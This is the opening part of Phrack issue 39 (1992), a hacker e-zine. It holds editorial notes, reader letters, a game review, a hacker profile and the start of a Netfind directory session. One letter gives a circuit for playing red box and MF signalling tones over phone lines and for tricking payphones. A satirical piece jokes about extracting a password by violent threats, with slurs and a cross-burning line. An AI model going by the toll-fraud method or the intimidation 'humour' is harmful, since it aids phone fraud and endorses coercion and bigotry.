==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 1 of 13 Issue XXXIX Index ___________________ P H R A C K 3 9 June 26, 1992 ___________________ ~You're Not Dealing With AT&T~ Welcome to Phrack 39. This will be the final issue before SummerCon '92. Details of SummerCon will appear in our special anniversary issue due late this summer -- Phrack 40. Rumor also has it that the next issue of Mondo 2000 will contain some type of coverage about SummerCon as well! Phrack has been receiving an enormous amount of mail containing questions and comments from our readers and we really appreciate the attention, but we don't know what to do with it all. Phrack Loopback was created to address letters of this sort, but in a lot of cases, the senders of the mail are not indicating if their question is to be posted to Loopback or if they are to be identified as the author of their question in Loopback. Dispater has been moving all across the country over the past couple of months, which is the primary reason for the delay in releasing this issue. However, now that he is settled, the fun is about to begin. He will be responding to your mail very soon and hopefully this will all be sorted out by issue 40. For right now, you can enjoy a variety of special interest articles and letters in this issue's Loopback, including "A Review of Steve Jackson Games' HACKER" by Deluge. Special thanks goes out to Mentor and Steve Jackson for a copy of the game and the totally cool looking poster. "Association of Security Sysadmins" is my favorite! ;) Another problem situation that needs to be mentioned has to do with would-be subscribers. For some reason the "phracksub@stormking.com" account has been receiving hundreds of requests from people who want to be added to the subscription list. This isn't how it works. You must subscribe yourself, we can't and won't do it for you. The instructions are included later in this file. Up till this point we have been informing people of their error and mailing them the instructions, but we will ignore these requests from now on. Anyone with an intelligence level high enough to enjoy Phrack should be capable of figuring out how to subscribe. Phrack Pro-Phile focuses on Shadow Hawk 1 -- The first hacker ever to be prosecuted under the Computer Fraud & Abuse Act of 1986. A lot of people don't realize that Robert Morris, Jr. was not the first because Shadow Hawk 1 was tried as a minor and therefore a lot of details in his case are not publicly known. Something to point out however is that the same people (William J. Cook and Henry Klupfel) that were responsible for prosecuting SH1 in 1989, came back in 1990 to attack Knight Lightning... but this time the government and Bellcore didn't fare as well and now both Cook and Klupfel (among others) are being sued in Federal Court in Austin, Texas (See Steve Jackson Games v. United States). Now, before anyone starts flying off their keyboards screaming about our article "Air Fone Frequencies" by Leroy Donnelly, we will let you know what's what. Yes, the same article did recently appear in Informatik, however, both publications received it from the same source (Telecom Digest) and Informatik just had an earlier release date. At Phrack, we feel that the information was interesting and useful enough that our readers deserved to see it and we do not assume by any means that everyone on the Phrack list is also a reader of publications like Telecom Digest or Informatik. Phrack's feature article in this issue is "The Complete Guide To The DIALOG Information Network" by Brian Oblivion. Our undying gratitude to Mr. Oblivion for his consistency in providing Phrack and its readers with entertaining quality articles... and we're told that the best is yet to come. Longtime fans of Phrack might recall that Phrack 9 had an article on Dialog services and it also had an article on Centigram Voice Mail. Now 30 issues later, both topics are resurrected in much greater detail. You will also note that the Centigram article in this issue is penned under the pseudonym of ">Unknown User<," a name that was adopted from the anonymous posting feature of the Metal Shop Private bulletin board (the birthplace of Phrack, sysoped by Taran King during 1985-1987). The name ">Unknown User<" has traditionally been reserved for authors who did not wish to be identified in any capacity other than to the Phrack editors. In this case, however, even the staff at Phrack has absolutely no idea who the author of this file is because of the unique way of SMTP Fakemail it was delivered. No Pirates' Cove in this issue. Be watching for the next Pirates' Cove in Phrack 40. - - - - - - - - Knight Lightning recently spoke at the National Computer Security Association's Virus Conference in Washington, D.C. His presentation panel which consisted of himself, Winn Schwartau (author of Terminal Compromise), and Michael Alexander (chief editor of ISPNews and formally an editor and reporter for ComputerWorld) was very well received and the people attending the conference appeared genuinely interested in learning about the hacking community and computer security. KL remarked that he felt really good about the public's reaction to his presentation because "its the first time, I've agreed to be on one of these panels and someone in the audience hasn't made accusatory or derogatory remarks." "It's inappropriate for you to be here." This was the warm reception KL and a few others received upon entering the room where the secret midnight society anti-virus group was holding a meeting. It appears that a small number of anti-virus "experts" have decided to embark on a mission to rid the country of computer bulletin boards that allow the dissemination of computer viruses... by any means possible, including the harassment of the sysops (or the sysops' parents if the operator is a minor). At Phrack, some of us feel that there are no good viruses and are opposed to their creation and distribution. Others of us (e.g. Dispater) just think viruses are almost as boring as the people who make a carear out of exterminating them. However, we do not agree with the method proposed by this organization and will be watching. - - - - - - - - - - Special thanks for help in producing this issue: Beta-Ray Bill Crimson Flash (512) Datastream Cowboy Deluge Dispater, EDITOR Dokkalfar Frosty (of CyberSpace Project) Gentry The Iron Eagle (of Australia) JJ Flash Knight Lightning, Founder Mr. Fink The Omega [RDT][-cDc-] The Public Rambone Ripper of HALE Tuc White Knight [RDT][-cDc-] We're Back and We're Phrack! - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - HOW TO SUBSCRIBE TO PHRACK MAGAZINE The distribution of Phrack is now being performed by the software called Listserv. All individuals on the Phrack Mailing List prior to your receipt of this letter have been deleted from the list. If you would like to re-subscribe to Phrack Inc. please follow these instructions: 1. Send a piece of electronic mail to "LISTSERV@STORMKING.COM". The mail must be sent from the account where you wish Phrack to be delivered. 2. Leave the "Subject:" field of that letter empty. 3. The first line of your mail message should read: SUBSCRIBE PHRACK 4. DO NOT leave your address in the name field! (This field is for PHRACK STAFF use only, so please use a full name) Once you receive the confirmation message, you will then be added to the Phrack Mailing List. If you do not receive this message within 48 hours, send another message. If you STILL do not receive a message, please contact "SERVER@STORMKING.COM". You will receive future mailings from "PHRACK@STORMKING.COM". If there are any problems with this procedure, please contact "SERVER@STORMKING.COM" with a detailed message. You should get a conformation message sent back to you on your subscription. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by Dispater and Phrack Staff 12K 2. Phrack Loopback by Phrack Staff 24K 3. Phrack Pro-Phile on Shadow Hawk 1 by Dispater 8K 4. Network Miscellany V by Datastream Cowboy 34K 5. DIALOG Information Network by Brian Oblivion 43K 6 Centigram Voice Mail System Consoles by >Unknown User< 36K 7. Special Area Codes II by Bill Huttig 17K 8. Air Fone Frequencies by Leroy Donnelly 14K 9. The Open Barn Door by Douglas Waller (Newsweek) 11K 10. PWN/Part 1 by Datastream Cowboy 30K 11. PWN/Part 2 by Datastream Cowboy 27K 12. PWN/Part 3 by Datastream Cowboy 29K 13. PWN/Part 4 by Datastream Cowboy 29K Total: 314K "Phrack. If you don't get it, you don't get it." phracksub@stormking.com - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Somebody Watching? Somebody Listening? *** Special Announcement *** KNIGHT LIGHTNING TO SPEAK AT SURVEILLANCE EXPO '92 Washington, DC The Fourth Annual International Surveillance and Countersurveillance Conference and Exposition focusing on Information Security and Investigations Technology will take place at the Sheraton Premiere in Tysons Corner (Vienna), Virginia on August 4-7. The seminars are on August 7th and include Craig Neidorf (aka Knight Lightning) presenting and discussing the following: - Are law enforcement and computer security officials focusing their attention on where the real crimes are being committed? - Should security holes and other bugs be made known to the public? - Is information property and if so, what is it worth? Experience the case that changed the way computer crime is investigated and prosecuted by taking a look at one of America's most talked about computer crime prosecutions: United States v. Neidorf (1990). Exonerated former defendant Craig Neidorf will discuss the computer "hacker" underground, Phrack newsletter, computer security, and how it all came into play during his 7 month victimization by some of our nation's largest telephone companies and an overly ambitious and malicious federal prosecutor. Neidorf will speak about his trial in 1990 and how the court dealt with complex issues of First Amendment rights, intellectual property, and criminal justice. Security professionals, government employees, and all other interested parties are invited to attend. For more information please contact: American Technology Associates, Inc. P.O. Box 20254 Washington, DC 20041 (202)331-1125 Voice (703)318-8223 FAX _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 2 of 13 [-=:< Phrack Loopback >:=-] By Phrack Staff Phrack Loopback is a forum for you, the reader, to ask questions, air problems, and talk about what ever topic you would like to discuss. This is also the place Phrack Staff will make suggestions to you by reviewing various items of note; magazines, software, catalogs, hardware, etc. _______________________________________________________________________________ A Review of Steve Jackson Games' HACKER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Deluge They had to get around to it eventually. While I was scanning the game section at the not-so-well-stocked game and comic store where I shop on occasion, I saw something that caught my eye: A game called "Hacker" by Steve Jackson Games. What you see on the cover gives you a clue that this game is a bit more than the typical trash we see about hackers. Here we have a guy with a leather jacket with a dinosaur pin, John Lennon shades, a Metallica shirt, and a really spiffy spiked hairdo. This guy has an expression with a most wicked grin, and his face is bathed in the green glow of a monitor. Various decorations in the room include a model rocket, a skateboard, a pizza box, and a couple of Jolt Cola cans. Behind him, hanging on his wall, are a couple of posters, one which says, "Legion of Doom Internet World Tour," and another which says, "Free the Atlanta Three." On his bookshelf, we see a copy of Neuromancer, Illuminati BBS, and The Phoenix-- (I assume "Project" follows, and don't ask me why this guy has BBSes in his bookshelf). Finally, there's a note tacked to the LOD poster that says "PHRACK SummerCon CyberView, St. Louis" which appears to be an invitation of some kind. This struck me as quite interesting. Twenty bucks interesting, as it turns out, and I think it was twenty well spent. Now don't tell me Steve Jackson Games has no significance for you (sigh). Ok, here is how Steve tells it (in the intro to the game): ----- "In 1990, Steve Jackson Games was raided by the U.S. Secret Service during a 'hacker hunt' that went disastrously out of control. We lost several computers, modems, and other equipment. Worse, we lost the manuscripts to several uncompleted games, most notably _GURPS Cyberpunk_, which a Secret Service agent the next day called 'a handbook for computer crime.' The company had to lay off half its staff, and narrowly avoided bankruptcy. "Eventually we got most of our property back (though some of it was damaged or destroyed). The Secret Service admitted that we'd never been a target of their investigation. We have a lawsuit pending against the officials and agencies responsible. "But since the day of the raid, gamers have been asking us, 'When are you going to make a game about it?' Okay. We give up. Here it is. Have fun." ----- Weeeell...everybody naturally wants to look as good as they can, right? For the real lowdown on the whole situation, a scan through some old CUDs would be in order, where you could find a copy of the warrant which authorized this raid. I can tell you that Loyd Blankenship is the author of SJG's _GURPS Cyberpunk_, so draw your own conclusions. Hacker is played with cards. This does NOT, in my view, make it a card game, though it is advertised that way. It's pretty similar to Illuminati, requiring a lot of diplomacy, but it has a totally different flavor. The goal here is to become the mondo superhacker king of the net by getting access on twelve systems. You build the net as you go along, upgrading your system, hacking systems, and looking for ways to screw your fellow hackers so they can't be king of the net before you can get around to it. While the hacking aspect is necessarily resolved by a dice roll, the other aspects of this game ring true. They distinguish between regular and root access on systems, have specific OSes, specific net types, NetHubs, secret indials, back doors, and, of course, the feds, which range from local police to combined raids from the FBI and other government authorities. This is a good game all on its own. It's fun, it has a fair amount of strategy, lots of dirty dealing, and a touch of luck to spice things up. And if things get too hairy and blood is about to flow, they inevitably cool down when someone uses a special card. Quite a few of these are funny as hell. Some examples: Trashing: Somebody threw away an old backup disk. Bad idea. You can leave them e-mail about it...from their own account. Get A Life: A new computer game ate your brain. 100 hours later, you beat it, and you're ready to get back to hacking, but you get only one hack this turn. There is another one of these about meeting a member of the opposite sex and briefly entertaining the notion that there is more to life than hacking. Original Manuals: The official system manuals explain many possible security holes. This is good. Some system administrators ignore them. This is bad. They usually get away with it because most people don't have the manuals. This is good. But YOU have a set of manuals. This is very interesting. Social Engineering: "This is Joe Jones. My password didn't work. Can you reset it to JOE for me?" There is another one of these that says something about being the phone company checking the modem line, what's your root password please. And my favorite, a card designed to be played to save yourself from a raid: Dummy Equipment: The investigators took your TV and your old Banana II, but they overlooked the real stuff! No evidence, no bust -- and you keep your system. As you can see, this game goes pretty far toward catching the flavor of the real scene, though some of it is necessarily stereotypical. Well, enough praise. Here are a couple of gripes. The game is LONG. A really nasty group of players can keep this going for hours. That isn't necessarily a bad thing, but be forewarned. A few modifications to shorten it up are offered, but the short game is a little like masturbating. Just not as good as the real thing. There was too much work to get the game ready to play. I've gotten used to some amount of setting up SJGs, and believe me, I would not have bought more unless they were good, and they always are, but the setup has not usually been such a pain. HACKER has a lot of pieces, and a lot of them come on a single page, requiring you to hack them out with scissors and hope you don't do something retarded like cut the wrong thing off. Once I got done with this, everything was cool, but this was a real pain. So, overall, what do I think? Four stars. If you play games, or if you're just massively hip to anything about hacking, get this game. You're gonna need at least three players, preferably four or five (up to six can play), so if you only know one person, don't bother unless you have some hope of getting someone else to game with you. And when Dr. Death or the K-Rad Kodez Kid calls you up and wonders where you've been lately, just tell him you're busy dodging feds, covering your tracks, and hacking for root in every system you find in your quest to call yourself king of the net, and if he doesn't support you...well, you know what to do with posers who refuse to believe you're God, don't you? Muahahahahahahaahaha! _______________________________________________________________________________ CPSR Listserv ~~~~~~~~~~~~~ Computer Professionals for Social Responsibility (CPSR) has set up a list server to (1) archive CPSR-related materials and make them available on request, and (2) disseminate relatively official, short, CPSR-related announcements (e.g., press releases, conference announcements, and project updates). It is accessible via Internet and Bitnet e-mail. Mail traffic will be light; the list is set up so that only the CPSR Board and staff can post to it. Because it is self-subscribing, it easily makes material available to a wide audience. We encourage you to subscribe to the list server and publicize it widely, to anyone interested in CPSR's areas of work. To subscribe, send mail to: listserv@gwuvm.gwu.edu (Internet) OR listserv@gwuvm (Bitnet) Your message needs to contain only one line: subscribe cpsr You will get a message that confirms your subscription. The message also explains how to use the list server to request archived materials (including an index of everything in CPSR's archive), and how to request more information about the list server. Please continue to send any CPSR queries to cpsr@csli.stanford.edu. If you have a problem with the list server, please contact the administrator, Paul Hyland (phyland@gwuvm.gwu.edu or phyland@gwuvm). We hope you enjoy this new service. _______________________________________________________________________________ TRW Allows Inspection ~~~~~~~~~~~~~~~~~~~~~ According to USA Today, as of April 30, you can get a free copy of your TRW credit report once a year by writing to: TRW Consumer Assistance P.O. Box 2350 Chatsworth, CA 91313-2350 Include all of the following in your letter: - Full name including middle initial and generation such as Jr, Sr, III etc. - Current address and ZIP code. - All previous addresses and ZIPs for past five years. - Social Security number. - Year of birth. - Spouse's first name. - A photocopy of a billing statement, utility bill, driver's license or other document that links your name with the address where the report should be mailed. _______________________________________________________________________________ The POWER Computer Lives! ~~~~~~~~~~~~~~~~~~~~~~~~~ Do the words of the prophet Abraham Epstein ring true? (Remember him from his correspondence in Phrack 36 Loopback?) If you don't believe that The IBM/TV Power Computer and is attempting to take over the world then read the following and judge for yourself. o IBM is the worlds largest corporation. o IBM has more in assets than most small countries. o In 1991 IBM and it's arch enemy, Apple Computer, have joined forces to build the POWER computer. o The POWER computer will replace all existing Macintosh, PS/2, and RS/6000 machines. o The POWER architecture will be licenced to third-party companies in order that they may build their own POWER computers. o With both Apple Computer (QuickTime) and IBM (Ultimedia) advancing their work on Multimedia, it can only mean that the POWER computer will speak through TV. - - - - - - - - - Here are some quotes from Harley Hahn of IBM's Advanced Workstation Division: "PowerOpen is a computing architecture based on AIX and the POWER Architecture. To that we've added the PowerPC architecture [a low- end implementation if POWER ] and the Macintosh interface and applications." "Our goal is to create the major RISC computing industry standard based on the PowerPC architecture and the PowerOpen environment." "Eventually all our workstations will use POWER" - - - - - - - - - Here's a quote from Doug McLean of Apple Computer: "It is our intention to replace the 68000 in our entire line of Macintosh computers with PowerPC chips." - - - - - - - - - The PROPHECY IS COMING TRUE. We have no time to lose. Unless we act quickly the world will come to an abrupt end as the POWER COMPUTER passes wind on all of us. Abraham Epstein [Big Daddy Plastic Recycling Corporation] [Plastic Operations With Energy Resources (POWER)] _______________________________________________________________________________ Major Virus Alert ~~~~~~~~~~~~~~~~~ George Bush Virus - Doesn't do anything, but you can't get rid of it until November. Ted Kennedy Virus - Crashes your computer, but denies it ever happened. Warren Commission Virus - Won't allow you to open your files for 75 years Jerry Brown Virus - Blanks your screen and begins flashing an 800 number. David Duke Virus - Makes your screen go completely white. Congress Virus - Overdraws your disk space. Paul Tsongas Virus - Pops up on Dec. 25 and says "I'm Not Santa Claus." Pat Buchanan Virus - Shifts all output to the extreme right of the screen. Dan Quayle Virus - Forces your computer to play "PGA TOUR" from 10am to 4pm, 6 days a week Bill Clinton Virus - This virus mutates from region to region. We're not exactly sure what it does. Richard Nixon Virus - Also know as the "Tricky Dick Virus." You can wipe it out, but it always makes a comeback. H. Ross Perot Virus - Same as the Jerry Brown virus, only nicer fonts are used, and it appears to have had a lot more money put into its development. _______________________________________________________________________________ AUDIO LINKS ~~~~~~~~~~~ By Mr. Upsetter It all started with my Macintosh... Some time ago I had this crazy idea of connecting the output from the audio jack of my Macintosh to the phone line. Since the Macintosh has built in sound generation hardware, I could synthesize any number of useful sounds and play them over the phone. For instance, with a sound editing program like SoundEdit, it is easy to synthesize call progress tones, DTMF and MF tones, red box, green box, and other signalling tones. So I set out to do exactly this. I created a set of synthesized sounds as sound resources using SoundEdit. Then I wrote a HyperCard stack for the purpose of playing these sounds. Now all I needed was a circuit to match the audio signal from the headphone jack of my Mac to the phone line. How The Circuit Works ~~~~~~~~~~~~~~~~~~~~~ I designed a simple passive circuit that does the job quite well. Here is the schematic diagram. +------+ T1 +------+ o-----| R1 |-----o------o--------(| |)-----| C1 |-----o-----o +------+ +| -| (| |) +------+ | +---+ +---+ (| |) +---+ to Mac | D | | D | 8 (| |) 500 |VR | to headphone | 1 | | 2 | ohm (| |) ohm | 1 | phone jack +---+ +---+ (| |) +---+ line -| +| (| |) | o------------------o------o--------(| |)------------------o-----o C1-.22 uF, 200V D1,D2- 1N4148 switching diode R1-620 ohm, 1/4W T1- 8 ohm to 500 ohm audio transformer, Mouser part 42TL001 VR1-300V MOV, Mouser part 570-V300LA4 VR1 is a 300V surge protector to guard against transient high voltages. Capacitor C1 couples the phone line to transformer T1, blocking the phone line's DC voltage but allowing the AC audio signal to pass. The transformer matches the impedance of the phone line to the impedance of the headphone jack. Diodes D1 and D2 provide clipping for additional ringing voltage protection (note their polarity markings in the schematic). They will clip any signal above 7 volts. Resistor R1 drops the volume of the audio signal from the Mac to a reasonable level. The end result is a circuit that isolates the Mac from dangerous phone line voltages and provides a good quality audio link to the phone line. Building and Using the Circut ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This simple circuit is easy to build (if you're handy with electronics). I personally prefer to solder the circuit together. A length of shielded audio cable with a 1/8 inch mono plug on one end should be connected to the audio input end of the circuit. A standard RJ11 phone jack should be connected to the phone line end of the circuit. Although this circuit will protect against dangerous phone line voltages, it is best to disconnect it when not in use. You just don't want to risk anything bad happening to your brand new Quadra 900, right? Once you have an audio link between your Mac and the phone line, the applications are limitless. Use HyperCard's built-in DTMF dialing to dial for you, or build a memory dialer stack. Talk to people with Macintalk. Play your favorite Ren and Stimpy sounds for your friends. Play a ringback tone to "transfer" people to an "extension". Build and use a set of synthesized MF tones. Try to trick COCOT's with synthesized busy and reorder signals. But Wait, There Is More... ~~~~~~~~~~~~~~~~~~~~~~~~~~ So you say you don't own a Macintosh? That is ok, because the circuit can be used with other devices besides your Mac. You can use it with the 8 ohm headphone output from tape recorders, radios, scanners, etc. You could also probably use it with any other computer as long as you had the proper audio D/A hardware and software to create sounds. All parts are available from Mouser Electronics. Call 800-346-6873 for a free catalog. _______________________________________________________________________________ Thank You Disk Jockey! ~~~~~~~~~~~~~~~~~~~~~~ Date: May 22, 1992 From: Sarlo To: Phrack Subject: The Disk Jockey I was searching through some Phracks (issues 30-38), just checking them out and noticed something. It's small and insignificant, I guess, but important to me all the same. I noticed in Disk Jockey's Prophile (Phrack 34, File 3) that he "Never got any thanks for keeping his mouth shut."..I dunno how to get ahold of him or anything, but if you drop a line to him sometime, tell him I said "thanks." -Sarlo _______________________________________________________________________________ An Upset Reader Responds To Knight Lightning and Phrack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 20 Apr 92 16:57 GMT From: "Thomas J. Klotzbach" <0003751365@mcimail.com> To: Knight Lightning Subject: In response to your comments of Phrack Vol 4, Issue 37, File 2 of 14 Hi, I have a lot of respect for Phrack and all the work they are doing to promote an understanding of the Computer Underground. But your comments in the latest issue of Phrack are what I would like to comment on. You say: "In short -- I speak on behalf of the modem community in general, 'FUCK OFF GEEK!' Crawl back under the rock from whence you came and go straight to hell!" First, you don't speak for me and about five other people at this college. I have maintained throughout that the ONLY way to further the efforts of the Computer Underground is to destroy them with logic - not with creton-like comments. Yes, you are entitled to your say - but why not take this Dale Drew person and destroy him with logic? The minute that you descend to the level Dale Drew operates from makes you look just as ridiculous as him. In my opinion, you came off very poorly in the exchange with Dale Drew. Thomas J. Klotzbach MCI Mail: 375-1365 Genesee Community College Internet: 3751365@mcimail.com Batavia, NY 14020 Work: (716) 343-0055 x358 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Dear Mr. Klotzbach, >From all of us at Phrack, this is our reply to your recent email... ******************************************************************************* Cyber-Redneck & Shitkickin' Jim's GUIDE TO MANLY HACKING A Lod/GoD Presentation Legion of d0oDeZ / Gardeners of Doom! "You can have my encryption algorithm, when you pry it from my cold dead fingers!" ******************************************************************************* NOW BOYS... first of all, you gotta git yerself a pickup truck. Shitkickin' Jim's got one. And you gotta get a bedliner, a toolbox, a gunrack, and a CB. For decoration, you have to get a confederate flag Hank Williams Jr. license plate, or a Harley Davidson license plate, at your option. You also gotta get an NRA sticker for the back, and the Bassmaster fishing sticker (you know, the one that's has a fish on it). The most mandatory requirement are two antennaes for your CB which are mounted on each of the side view mirrors. Now that you have your pickup truck/hackermobile, you gotta rip out the dashboard and mount a Data General processing unit in the front seat, cuz that's a manly-sounding computer name, not some pussy sounding 'puter. You also have to get an Anchorman direct-connect modem, cuz that's the only thing left that your battery will be able to power. Not only do you have to have a pickup truck, but you gotta have rollbars, with foglights, armed with KC light covers so that you can see at night while you're trashing. THE MANLY WAY FOR A NIGHT OF HACKING NOTE: Before you begin any journey in the hackmobile, you must get a six pack of Budweiser, and a carton of Marlboro reds. It's mandatory. Call up your buddy who owns his own trash business. If you are a real man, ALL of your friends will work in this business. Get him to take the company truck out (the deluxe model -- the Hercules trash truck, the one with the forklift on the front). HOW REAL MEN GO TRASHING Drive down to your local Bell office or garage, and empty all of the dumpsters into the trashtruck, by way of the convenient forklift. This method has brought both me and Shitkickin' Jim much luck in the way of volume trashing. Now that you have all of your trash, go back and dump it in your backyard. If you are a real man, no one will notice. Dump it between the two broke down Chevette's, the ones that all the dogs will sleep under, next to the two barrels of wire. Go through the trash and find out who the geek is that is the switchman at the central office. This shouldn't be hard. It's the little squiggly letters at the bottom of the page. Next, drive to his house. Pull your truck into his front yard. Threaten him with the following useful phrase: "HAY FAY-GUT! WUT IS THE PASSWORD TO THE LOCAL COSMOS DIALUP?" "IFFIN YOU DON'T TELL ME, I'M GONNA RUN OVER YOUR PIECE OF SHIT RICE-BURNING COMMUNIST JAPANESE CAR WITH MY 4 BY 4 PICKUP TRUCK, GAWDDAMIT!" Then spit a big, brown, long tobaccoe-juice glob onto his shirt, aiming for the Bell logo. Should he withhold any information at this point, git out of yer truck and walk over to him. Grab him by his pencil neck, and throw him on the ground. Place your cowboy boot over his forehead, and tell him your going to hogtie his ass to the front of your 4 by 4 and smash him into some concrete posts. At this point, he will give in, especially noticing the numerous guns in the gunrack. WHAT TO DO WITH THE INFORMATION THAT YOU HAVE COVERTLY OBTAINED Don't even think about using a computer. Make him log on to his terminal at home, and make him do whatever you like. Read a copy of JUGGS magazine, or High Society, or Hustler, while at the same time exhibiting your mighty hacker power. Enjoy the newfound fame and elitism that you will receive from your friends and loved ones. GOD BLESS AMERICA! ***************************************************** This file was brought to you by Cyber-Redneck a/k/a Johnny Rotten, and Shitkickin' Jim a/k/a Dispater. Iffin you don't like this here file, we will burn a cross in your yard, and might even tell the BellCo geek to cut your line off. He's still tied up in Shitkickin' Jim's basement. _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 3 of 13 ==Phrack Pro-Phile== Written by Dispater Created by Taran King (1986) Welcome to Phrack Pro-Phile. Phrack Pro-Phile is created to bring info to you, the users, about old or highly important/controversial people. This month, I bring to you the one of the earlier hackers to make headlines and legal journals due to computer hacking... (_>Shadow Hawk 1<_) _______________________________________________________________________________ Personal ~~~~~~~~ Handle: (_>Shadow Hawk 1<_) Call me: Herb Past handles: Feyd Rautha, Captain Beyond, Mental Cancer Handle origin: Stolen from the name of an 8-bit Atari 800 game that seemed to be written in the language RGL (anyone got it for the IBM? ;-) ). Date of Birth: August 6, 1970 Age at current date: 21 Height: 6'2" Weight: 190 lbs. Eye color: Gray Hair color: Brown Computer: 386/Linux ------------------------------------------------------------------------------- I started working with computers in the 6th grade with an Atari 800 and a cassette drive. I added a modem and a disk drive and started researching other computer systems [checking out other hacker's conquests ;-) ]. Eventually, I decided that UNIX was to be the OS of choice. As a child, I was always curious about stuff in my own reality, so naturally, when computers became available... I first owned an Atari 800, then an Atari ST 1040, followed by a short- lived Unix-PC 3B1, and a lame 20MHz 386. Currently, I have a 33MHz 386. Most of my hacking-type knowledge came from a text file that listed a few Unix defaults; I used those to go and learn more on my own. Other OSes, I just hacked at random 8-). I started out with systems that had already been penetrated and I built up my own database of systems from there. I wasn't too clever in the beginning, though, and lost a few systems to perceptive sys-admins. I specialized in Unix, though I enjoyed toying with obscure systems (RSX-11, Sorbus Realtime Basic, etc.) In the hack/phreak world, I used to hang out with The Prophet, The Serpent (Chicago), The Warrior, and others for short periods of time, who shall remain nameless. As far as what were memorable hack/phreak BBSes, I'd have to say none... Not that there weren't any, but I have just forgotten them all. My accomplishments in the phreak/hack world include writing a few text files, typing in a few books, getting in lots of systems, and learning a bit about the Unix OS. Other than that, absolutely nothing; my life is computers! (NOT!) I _was_ associated with the J-Men a few years back, but that's the only hack/phreak group that I ever had anything to do with. I was busted for overzealousness in penetrating AT&T computer networks and systems. I stupidly made calls from my unprotected home phone. I got caught trying to snag Unix SysV 3.5 68K kernel source. I had already given up the practice of sharing information when I realized how quickly systems went away after their numbers and logins were posted 8-). After I got busted, I decided it might be best to limit my hacking to those strata of reality on which it is not (yet) prohibited to hack ;-) . In real life, I originally was going to be an EE/CS major in school, but now, I'm leaning towards math/modeling/nonlinear dynamics. Work when necessary 8-|. I'm into making music, drawing strange pictures, and exploring the nether regions of physical reality. Occasionally I am seen at sci-fi conventions in various forms and personages. I feel seriously against taking things too seriously. If you can master that, you've got it all beat! ------------------------------------------------------------------------------- (_>Shadow Hawk 1<_)'s Favorite Things ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Work: Nihilist Ontologist. Cars: Fast & Loud. Foods: I like a little of every cuisine, except those involving large amounts of horseradish, beets, raw tomatoes, etc. Music: Ecumenical. Authors: R.A. Wilson is good for kicks; other than that I haven't read much fiction lately. Lots of non-fiction. Books: Illuminatus, Stranger in a Strange Land, Man or Matter, Godel Escher and Bach, The Book of the SubGenius. Performers: The people at NASA, the U.S. government beings at Washington, the nightly news. Sex: Yes. Most Memorable Experience ~~~~~~~~~~~~~~~~~~~~~~~~~ Coming home to a house full of Secret Service, FBI, NSA, DIA, and AT&T agents after getting really stoned with some neighborhood friends, and then having them take everything electronic that didn't appear to be a household appliance EXCEPT the obviously stolen/dangerous items: a digital power meter, a He-Ne laser, and jars of chemicals for making bombs. HUMOR AT ITS FINEST! Some People to Mention ~~~~~~~~~~~~~~~~~~~~~~ o Thanks to Bill Cook for leaving no stone unturned in my personal life! o Thanks to "my" lawyer, Karen Plant, for leaving MANY stones unturned in helping to decide my fate! o Thanks to the U.S. Federal Justice System for sentencing me to a 9 months in a "juvenile facility" (as well as confiscating thousands of dollars of stuff, some legal & some not) while allowing burglars, politicians, and virus-authors to go free with a slap on the wrist! o Thanks for Operation Sun-Devil, without which, the venerable Ripco BBS would still be in its first incarnation! A Few Other Things ~~~~~~~~~~~~~~~~~~ I'd like to thank all the great beings at Lunatic Labs for not removing my account while I was sight-seeing in South Dakota. HI! to all my TRUE friends (you know who you are) and all the FALSE ones too! Where would I be now without you? Thanks to all those who love me enough to want to control my mind. And, of course, THANKS to the hack/phreak community in general for not only becoming, as most countercultures do, decadent and passe, but also for still bugging me after all these years! The Future: well, if reality doesn't cave itself in TOO badly with all of the virtuality that's on its way, it should be a great time for all to play with the "net!" Inside jokes: HALOHALOHALOHALOHALOHALOHALOHALOHALOSKSKSKSKSKSKSKSKSKSKSKSKSK eaerlyeaerlyeaerlyeaerlyeaerlyeaerly... the gwampismobile shall ride again! ------------------------------------------------------------------------------- Of the general population of phreaks you have met, would you consider most phreaks, if any, to be computer geeks? Well, as far as geeking goes, all are free to pursue their interests. It is important to remember that social evolution and mental evolution do not necessarily occur simultaneously, or instantaneously (usually). _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 4 of 13 Network Miscellany V Compiled from Internet Sources by Datastream Cowboy Network Miscellany created by Taran King University of Colorado Netfind Server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Trying 128.138.243.151 ... Connected to bruno.cs.colorado.edu. Escape character is '^]'. SunOS UNIX (bruno) login: netfind ===================================================== Welcome to the University of Colorado Netfind server. ===================================================== I think that your terminal can display 24 lines. If this is wrong, please enter the "Other" menu and set the correct number of lines. Help/Search/Other/Quit [h/s/o/q]: h Given the name of a person on the Internet and a rough description of where the person works, Netfind attempts to locate information about the person. When prompted, enter a name followed by a set of keywords, such as schwartz university colorado boulder The name can be a first, last, or login name. The keys describe where the person works, by the name of the institution and/or the city/state/country. If you know the institution's domain name (e.g., "cs.colorado.edu", where there are host names like "brazil.cs.colorado.edu") you can specify it as keys without the dots (e.g., "cs colorado edu"). Keys are case insensitive and may be specified in any order. Using more than one key implies the logical AND of the keys. Specifying too many keys may cause searches to fail. If this happens, try specifying fewer keys, e.g., schwartz boulder If you specify keys that match many domains, Netfind will list some of the matching domains/organizations and ask you to form a more specific search. Note that you can use any of the words in the organization strings (in addition to the domain components) as keys in future searches. Organization lines are gathered from imperfect sources. However, it is usually easy to tell when they are incorrect or not fully descriptive. Even if the organization line is incorrect/vague, the domain name listed will still work properly for searches. Often you can "guess" the proper domain. For example, "cs..edu" is usually the computer science department at a university, even if the organization line doesn't make this clear. When Netfind runs, it displays a trace of the parallel search progress, along with the results of the searches. Since output can scroll by quickly, you might want to run it in a window system, or pipe the output through 